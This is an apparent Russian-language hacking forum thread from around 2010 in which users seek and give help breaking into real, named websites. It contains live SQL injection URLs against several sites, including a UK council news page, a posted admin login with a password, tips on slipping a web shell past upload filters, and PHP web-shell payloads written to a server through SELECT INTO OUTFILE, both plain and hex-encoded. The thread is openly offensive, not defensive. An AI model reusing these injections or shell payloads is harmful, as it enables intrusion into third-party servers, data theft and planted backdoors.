Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Заливаю шелл shell.php, shell.php.doc, shell.php.txt

    выводит такую ошибку

    Wrong field content:

    File - allowed file extensions are PDF, PPT, PPS, DOC, XLS, TXT, HTM, HTML, GIF, JPG, RAR, ZIP

    Как еще можно попробывать залить шелл?

    Заранее всем спасибо!
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не проходит.
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/select+1,2,UNHEX(HEX(concat_ws(0x3a,table_schema,table_name,column_name))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/from/**/information_schema.columns+limit+1,1--
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите залить шелл!

    http://www.arnold.ee/admin/

    Arnold:040286
     
    1 person likes this.
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    не связаны
     
  6. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Где можно регнуть базу данных MySQL так что бы можно запускать скрипты на взломанном сервере, а база данных была отдельно??
    P.S. сори немного не по теме может!!
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    http://www.freemysql.net/
    http://www.freesql.org/freesql/mysql
     
    1 person likes this.
  8. Monaxdixon

    Monaxdixon New Member

    Joined:
    18 May 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Кто может дать названия имен таблиц и столбцов?

    Мне не понятно какие именна подбирать?
     
  9. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Monaxdixon
    Чаще всего что то типо
    user users admin mysql members phpbb_users
    и так далее!!
    Вот список из 650 таблиц которые чаще всего бывают
    http://narod.ru/disk/21459300000/tabl.rar.html
     
    #13329 GOGA075, 3 Jun 2010
    Last edited: 3 Jun 2010
  10. [ DSU ]

    [ DSU ] Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    103
    Likes Received:
    96
    Reputations:
    88
    скачай SIPT с ним идет небольшой словарик таблиц, думаю хватит ибо если там нет то обычно тогда идет просто долбанутый префикс к нажваниям таблы который просто так не брутанеш
     
  11. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Microsoft JET Database Engine error '80040e14'

    Этот сайт является пользователем таблицы
    http://www.southend.gov.uk/news/default.asp?id=946'

    Microsoft JET Database Engine error '80040e14'
    Syntax error in string in query expression 'releaseID =946' ORDER BY displayOrder DESC'.

    /news/includes/applogic_head.asp, line 23

    Поэтому мы получили синтаксической ошибки в " FROM clasue.", когда мы используем union?
    так, как мы можем придать этот сайт? :confused:

    http://www.southend.gov.uk/news/default.asp?id=-946+union+select+1,2%20from%20user--

    Microsoft JET Database Engine error '80004005'

    Syntax error in FROM clause.

    /news/includes/applogic_head.asp, line 23
     
  12. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    net eto access injection..pervoe nayti table_name a potomo column number//
    naprimer
    http://www.southend.gov.uk/news/default.asp?id=946+union+select+0+from+admin
     
  13. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Помогите плз.
    Узнал через пхп инъекц. доступ от МУСКУл.
    Создаю в файле запрос
    select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
    Пишет ошибку,так как у нас $_GET['cmd']
    Подскажите как обойти эти кавычки =)
     
  14. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    во-первых можно захексить -
    Code:
    select 0x3C3F70687020706173737468727528245F4745545B27636D64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
    во-вторых можно без кавычек
    Code:
    select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
    в-третьих - юзай eval
     
  15. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
    файл создался, пишет ошибку
    Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1

    я чето не вижу в синтаксисе ошибку((
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    ты прямо подставляй запрос cmd=phpinfo();
     
    _________________________
  17. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Я ведь делаю запрос со своего сервера, с файла
    $query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
    $res = mysql_query($query);

    ошибка syntax error

    Если пишу eval($_GET[cmd]); <- без кавычек
    то оштбка:yntax error, unexpected ')'

    Помогите, может както кодировку понятную мускул зделать?
     
  18. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Хекси.
     
  19. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    О )) спс)) все работает)
    И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
     
    #13339 stasiliy, 3 Jun 2010
    Last edited: 3 Jun 2010
  20. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    привет команде;

    Можно ли придать этим сайтом? потому что я пытался, но никакого результата

    http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1

    http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
    :confused:
     
Thread Status:
Not open for further replies.